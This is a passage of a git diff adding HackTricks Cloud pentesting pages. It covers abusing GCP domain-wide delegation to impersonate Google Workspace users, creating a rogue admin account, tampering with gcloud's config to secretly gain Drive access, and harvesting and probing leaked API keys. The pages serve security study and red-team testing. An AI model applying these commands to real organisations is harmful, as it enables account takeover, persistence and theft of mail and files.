+
+{% hint style="danger" %}
+Note that when configuring the domain wide delegation no Workspace user is needed, therefore just know **one valid one is enough and required for the impersonation**.\
+However, the **privileges of the impersonated user will be used**, so if it's Super Admin you will be able to access everything. If it doesn't have any access this will be useless.
+{% endhint %}
+
+#### [GCP Generate Delegation Token](https://github.com/carlospolop/gcp_gen_delegation_token)
+
+This simple script will **generate an OAuth token as the delegated user** that you can then use to access other Google APIs with or without `gcloud`:
+
+```bash
+# Impersonate indicated user
+python3 gen_delegation_token.py --user-email <user-email> --key-file <path-to-key-file>
+
+# Impersonate indicated user and add additional scopes
+python3 gen_delegation_token.py --user-email <user-email> --key-file <path-to-key-file> --scopes "https://www.googleapis.com/auth/userinfo.email, https://www.googleapis.com/auth/cloud-platform, https://www.googleapis.com/auth/admin.directory.group, https://www.googleapis.com/auth/admin.directory.user, https://www.googleapis.com/auth/admin.directory.domain, https://mail.google.com/, https://www.googleapis.com/auth/drive, openid"
+```
+
+#### [**DeleFriend**](https://github.com/axon-git/DeleFriend)
+
+This is a tool that can perform the attack following these steps:
+
+1. **Enumerate GCP Projects** using Resource Manager API.
+2. Iterate on each project resource, and **enumerate GCP Service account resources** to which the initial IAM user has access using _GetIAMPolicy_.
+3. Iterate on **each service account role**, and find built-in, basic, and custom roles with _**serviceAccountKeys.create**_ permission on the target service account resource. It should be noted that the Editor role inherently possesses this permission.
+4. Create a **new `KEY_ALG_RSA_2048`** private key to each service account resource which is found with relevant permission in the IAM policy.
+5. Iterate on **each new service account and create a `JWT`** **object** for it which is composed of the SA private key credentials and an OAuth scope. The process of creating a new _JWT_ object will **iterate on all the existing combinations of OAuth scopes** from **oauth\_scopes.txt** list, in order to find all the delegation possibilities. The list **oauth\_scopes.txt** is updated with all of the OAuth scopes we’ve found to be relevant for abusing Workspace identities.
+6. The `_make_authorization_grant_assertion` method reveals the necessity to declare a t**arget workspace user**, referred to as _subject_, for generating JWTs under DWD. While this may seem to require a specific user, it's important to realize that **DWD influences every identity within a domain**. Consequently, creating a JWT for **any domain user** affects all identities in that domain, consistent with our combination enumeration check. Simply put, one valid Workspace user is adequate to move forward.\
+   This user can be defined in DeleFriend’s _config.yaml_ file. If a target workspace user is not already known, the tool facilitates the automatic identification of valid workspace users by scanning domain users with roles on GCP projects. It's key to note (again) that JWTs are domain-specific and not generated for every user; hence, the automatic process targets a single unique identity per domain.
+7. **Enumerate and create a new bearer access token** for each JWT and validate the token against tokeninfo API.
+
+#### [Gitlab's Python script](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gcp_misc/-/blob/master/gcp_delegation.py)
+
+Gitlab've created [this Python script](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp_misc/blob/master/gcp_delegation.py) that can do two things - list the user directory and create a new administrative account while indicating a json with SA credentials and the user to impersonate. Here is how you would use it:
+
+```bash
+# Install requirements
+pip install --upgrade --user oauth2client
+
+# Validate access only
+./gcp_delegation.py --keyfile ./credentials.json \
+    --impersonate steve.admin@target-org.com \
+    --domain target-org.com
+
+# List the directory
+./gcp_delegation.py --keyfile ./credentials.json \
+    --impersonate steve.admin@target-org.com \
+    --domain target-org.com \
+    --list
+
+# Create a new admin account
+./gcp_delegation.py --keyfile ./credentials.json \
+    --impersonate steve.admin@target-org.com \
+    --domain target-org.com \
+    --account pwned
+```
+
+### Create a new delegation (Persistence)
+
+It's possible to **check Domain Wide Delegations in** [**https://admin.google.com/u/1/ac/owl/domainwidedelegation**](https://admin.google.com/u/1/ac/owl/domainwidedelegation)**.**
+
+An attacker with the ability to **create service accounts in a GCP project** and **super admin privilege to GWS could create a new delegation allowing SAs to impersonate some GWS users:**
+
+1. **Generating a New Service Account and Corresponding Key Pair:** On GCP, new service account resources can be produced either interactively via the console or programmatically using direct API calls and CLI tools. This requires the **role `iam.serviceAccountAdmin`** or any custom role equipped with the **`iam.serviceAccounts.create`** **permission**. Once the service account is created, we'll proceed to generate a **related key pair** (**`iam.serviceAccountKeys.create`** permission).
+2. **Creation of new delegation**: It's important to understand that **only the Super Admin role possesses the capability to set up global Domain-Wide delegation in Google Workspace** and Domain-Wide delegation **cannot be set up programmatically,** It can only be created and adjusted **manually** through the Google Workspace **console**.
+   * The creation of the rule can be found under the page **API controls → Manage Domain-Wide delegation in Google Workspace Admin console**.
+3. **Attaching OAuth scopes privilege**: When configuring a new delegation, Google requires only 2 parameters, the Client ID, which is the **OAuth ID of the GCP Service Account** resource, and **OAuth scopes** that define what API calls the delegation requires.
+   * The **full list of OAuth scopes** can be found [**here**](https://developers.google.com/identity/protocols/oauth2/scopes), but here is a recommendation: `https://www.googleapis.com/auth/userinfo.email, https://www.googleapis.com/auth/cloud-platform, https://www.googleapis.com/auth/admin.directory.group, https://www.googleapis.com/auth/admin.directory.user, https://www.googleapis.com/auth/admin.directory.domain, https://mail.google.com/, https://www.googleapis.com/auth/drive, openid`
+4. **Acting on behalf of the target identity:** At this point, we have a functioning delegated object in GWS. Now, **using the GCP Service Account private key, we can perform API calls** (in the scope defined in the OAuth scope parameter) to trigger it and **act on behalf of any identity that exists in Google Workspace**. As we learned, the service account will generate access tokens per its needs and according to the permission he has to REST API applications.
+   * Check the **previous section** for some **tools** to use this delegation.
+
+#### Cross-Organizational delegation
+
+OAuth SA ID is global and can be used for **cross-organizational delegation**. There has been no restriction implemented to prevent cross-global delegation. In simple terms, **service accounts from different GCP organizations can be used to configure domain-wide delegation on other Workspace organizations**. This would result in **only needing Super Admin access to Workspace**, and not access to the same GCP account, as the adversary can create Service Accounts and private keys on his personally controlled GCP account.
+
+### Creating a Project to enumerate Workspace
+
+By **default** Workspace **users** have the permission to **create new projects**, and when a new project is created the **creator gets the Owner role** over it.
+
+Therefore, a user can **create a project**, **enable** the **APIs** to enumerate Workspace in his new project and try to **enumerate** it.
+
+{% hint style="danger" %}
+In order for a user to be able to enumerate Workspace he also needs enough Workspace permissions (not every user will be able to enumerate the directory).
+{% endhint %}
+
+{% code overflow="wrap" %}
+```bash
+# Create project
+gcloud projects create <uniq-projec-name> --name=proj-name
+# Set project
+gcloud config set project <uniq-projec-name>
+# Enable svcs
+gcloud services enable admin.googleapis.com
+gcloud services enable cloudidentity.googleapis.com
+# Get org ID
+gcloud organizations list
+# Get currents email user groups (at least you can check the groups and members of the groups you belong to)
+gcloud identity groups memberships search-transitive-groups --member-email <email> --labels=cloudidentity.googleapis.com/groups.discussion_forum
+gcloud identity groups memberships list --group-email=g<group-email>
+
+# FROM HERE THE USER NEEDS TO HAVE ENOUGH WORKSPACE ACCESS
+gcloud beta identity groups preview --customer <org-cust-id>
+```
+{% endcode %}
+
+Check **more enumeration in**:
+
+{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %}
+[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md)
+{% endcontent-ref %}
+
+### Abusing Gcloud credentials
+
+You can find further information about the `gcloud` flow to login in:
+
+{% content-ref url="../gcp-persistence/gcp-non-svc-persistance.md" %}
+[gcp-non-svc-persistance.md](../gcp-persistence/gcp-non-svc-persistance.md)
+{% endcontent-ref %}
+
+As explained there, gcloud can request the scope **`https://www.googleapis.com/auth/drive`** which would allow a user to access the drive of the user.\
+As an attacker, if you have compromised **physically** the computer of a user and the **user is still logged** with his account you could login generating a token with access to drive using:
+
+```bash
+gcloud auth login --enable-gdrive-access
+```
+
+If an attacker compromises the computer of a user he could also modify the file `google-cloud-sdk/lib/googlecloudsdk/core/config.py` and add in the **`CLOUDSDK_SCOPES`** the scope **`'https://www.googleapis.com/auth/drive'`**:
+
+<figure><img src="../../../.gitbook/assets/image (342).png" alt="" width="563"><figcaption></figcaption></figure>
+
+{% hint style="warning" %}
+Therefore, the next time the user logs in he will create a **token with access to drive** that the attacker could abuse to access the drive. Obviously, the browser will indicate that the generated token will have access to drive, but as the user will call himself the **`gcloud auth login`**, he probably **won't suspect anything.**
+
+To list drive files: **`curl -H "Authorization: Bearer $(gcloud auth print-access-token)" "https://www.googleapis.com/drive/v3/files"`**
+{% endhint %}
+
+## From GWS to GCP
+
+### Access privileged GCP users
+
+If an attacker has complete access over GWS he will be able to access groups with privilege access over GCP or even users, therefore moving from GWS to GCP is usually more "simple" just because **users in GWS have high privileges over GCP**.
+
+### Google Groups Privilege Escalation
+
+By default users can **freely join Workspace groups of the Organization** and those groups **might have GCP permissions** assigned (check your groups in [https://groups.google.com/](https://groups.google.com/)).
+
+Abusing the **google groups privesc** you might be able to escalate to a group with some kind of privileged access to GCP.
+
+### References
+
+* [https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover](https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md b/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md
new file mode 100644
index 0000000000..ace16c0460
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md
@@ -0,0 +1,54 @@
+# GCP - Understanding Domain-Wide Delegation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+This post is the introduction of [https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover](https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover) which can be accessed for more details.
+
+## **Understanding Domain-Wide Delegation**
+
+Google Workspace's Domain-Wide delegation allows an identity object, either an **external app** from Google Workspace Marketplace or an internal **GCP Service Account**, to **access data across the Workspace on behalf of users**. This feature, which is crucial for apps interacting with Google APIs or services needing user impersonation, enhances efficiency and minimizes human error by automating tasks. Using OAuth 2.0, app developers and administrators can give these service accounts access to user data without individual user consent.\
+\
+Google Workspace allows the creation of two main types of global delegated object identities:
+
+* **GWS Applications:** Applications from the Workspace Marketplace can be set up as a delegated identity. Before being made available in the marketplace, each Workspace application undergoes a review by Google to minimize potential misuse. While this does not entirely eliminate the risk of abuse, it significantly increases the difficulty for such incidents to occur.
+* **GCP Service Account:** Learn more about [**GCP Service Accounts here**](../gcp-basic-information/#service-accounts).
+
+### **Domain-Wide Delegation: Under the Hood**
+
+This is how a GCP Service Account can access Google APIs on behalf of other identities in Google Workspace:
+
+<figure><img src="../../../.gitbook/assets/image (58).png" alt=""><figcaption></figcaption></figure>
+
+1. **Identity creates a JWT:** The Identity uses the service account's private key (part of the JSON key pair file) to sign a JWT. This JWT contains claims about the service account, the target user to impersonate, and the OAuth scopes of access to the REST API which is being requested.
+2. **The Identity uses the JWT to request an access token:** The application/user uses the JWT to request an access token from Google's OAuth 2.0 service. The request also includes the target user to impersonate (the user's Workspace email), and the scopes for which access is requested.
+3. **Google's OAuth 2.0 service returns an access token:** The access token represents the service account's authority to act on behalf of the user for the specified scopes. This token is typically short-lived and must be refreshed periodically (per the application's need). It's essential to understand that the OAuth scopes specified in the JWT token have validity and impact on the resultant access token. For instance, access tokens possessing multiple scopes will hold validity for numerous REST API applications.
+4. **The Identity uses the access token to call Google APIs**: Now with a relevant access token, the service can access the required REST API. The application uses this access token in the "Authorization" header of its HTTP requests destined for Google APIs. These APIs utilize the token to verify the impersonated identity and confirm it has the necessary authorization.
+5. **Google APIs return the requested data**: If the access token is valid and the service account has appropriate authorization, the Google APIs return the requested data. For example, in the following picture, we’ve leveraged the _users.messages.list_ method to list all the Gmail message IDs associated with a target Workspace user.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md
new file mode 100644
index 0000000000..fd78bc1bbd
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md
@@ -0,0 +1,44 @@
+# GCP - Unauthenticated Enum & Access
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Public Assets Discovery
+
+One way to discover public cloud resources that belongs to a company is to scrape their webs looking for them. Tools like [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) will scrape the web an search for **links to public cloud resources** (in this case this tools searches `['amazonaws.com', 'digitaloceanspaces.com', 'windows.net', 'storage.googleapis.com', 'aliyuncs.com']`)
+
+Note that other cloud resources could be searched for and that some times these resources are hidden behind **subdomains that are pointing them via CNAME registry**.
+
+## Public Resources Brute-Force
+
+### Buckets, Firebase, Apps & Cloud Functions
+
+* [https://github.com/initstring/cloud\_enum](https://github.com/initstring/cloud_enum): This tool in GCP brute-force Buckets, Firebase Realtime Databases, Google App Engine sites, and Cloud Functions
+* [https://github.com/0xsha/CloudBrute](https://github.com/0xsha/CloudBrute): This tool in GCP brute-force Buckets and Apps.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md
new file mode 100644
index 0000000000..80e5cfb497
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md
@@ -0,0 +1,78 @@
+# GCP - API Keys Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## API Keys
+
+For more information about API Keys check:
+
+{% content-ref url="../gcp-services/gcp-api-keys-enum.md" %}
+[gcp-api-keys-enum.md](../gcp-services/gcp-api-keys-enum.md)
+{% endcontent-ref %}
+
+### OSINT techniques
+
+**Google API Keys are widely used by any kind of applications** that uses from the client side. It's common to find them in for websites source code or network requests, in mobile applications or just searching for regexes in platforms like Github.
+
+The regex is: **`AIza[0-9A-Za-z_-]{35}`**
+
+Search it for example in Github following: [https://github.com/search?q=%2FAIza%5B0-9A-Za-z\_-%5D%7B35%7D%2F\&type=code\&ref=advsearch](https://github.com/search?q=%2FAIza%5B0-9A-Za-z_-%5D%7B35%7D%2F\&type=code\&ref=advsearch)
+
+### Check origin GCP project - `apikeys.keys.lookup`
+
+This is extremely useful to check to **which GCP project an API key that you have found belongs to**:
+
+```bash
+# If you have permissions
+gcloud services api-keys lookup AIzaSyD[...]uE8Y
+name: projects/5[...]6/locations/global/keys/28d[...]e0e
+parent: projects/5[...]6/locations/global
+
+# If you don't, you can still see the project ID in the error msg
+gcloud services api-keys lookup AIzaSy[...]Qbkd_oYE
+ERROR: (gcloud.services.api-keys.lookup) PERMISSION_DENIED: Permission 'apikeys.keys.lookup' denied on resource project.
+Help Token: ARD_zUaNgNilGTg9oYUnMhfa3foMvL7qspRpBJ-YZog8RLbTjCTBolt_WjQQ3myTaOqu4VnPc5IbA6JrQN83CkGH6nNLum6wS4j1HF_7HiCUBHVN
+- '@type': type.googleapis.com/google.rpc.PreconditionFailure
+  violations:
+  - subject: ?error_code=110002&service=cloudresourcemanager.googleapis.com&permission=serviceusage.apiKeys.getProjectForKey&resource=projects/89123452509
+    type: googleapis.com
+- '@type': type.googleapis.com/google.rpc.ErrorInfo
+  domain: apikeys.googleapis.com
+  metadata:
+    permission: serviceusage.apiKeys.getProjectForKey
+    resource: projects/89123452509
+    service: cloudresourcemanager.googleapis.com
+  reason: AUTH_PERMISSION_DENIED
+```
+
+### Brute Force API endspoints
+
+As you might not know which APIs are enabled in the project, it would be interesting to run the tool [https://github.com/ozguralp/gmapsapiscanner](https://github.com/ozguralp/gmapsapiscanner) and check **what you can access with the API key.**
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md
new file mode 100644
index 0000000000..b6340a72b2
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md
@@ -0,0 +1,51 @@
+# GCP - App Engine Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## App Engine
+
+For more information about App Engine check:
+
+{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %}
+[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md)
+{% endcontent-ref %}
+
+### Brute Force Subdomains
+
+As mentioned the URL assigned to App Engine web pages is **`<project-uniq-name>.appspot.com`** and if a service name is used it'll be: **`<servicename>-dot-<project-uniq-name>.appspot.com`**.
+
+As the **`project-uniq-name`** can be set by the person creating the project, they might be not that random and **brute-forcing them could find App Engine web apps exposed by companies**.
+
+You could use tools like the ones indicated in:
+
+{% content-ref url="./" %}
+[.](./)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md
new file mode 100644
index 0000000000..2e3594d5ac
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md
@@ -0,0 +1,47 @@
+# GCP - Artifact Registry Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Artifact Registry
+
+For more information about Artifact Registry check:
+
+{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %}
+[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md)
+{% endcontent-ref %}
+
+### Dependency Confusion
+
+Check the following page:
+
+{% content-ref url="../gcp-persistence/gcp-artifact-registry-persistence.md" %}
+[gcp-artifact-registry-persistence.md](../gcp-persistence/gcp-artifact-registry-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
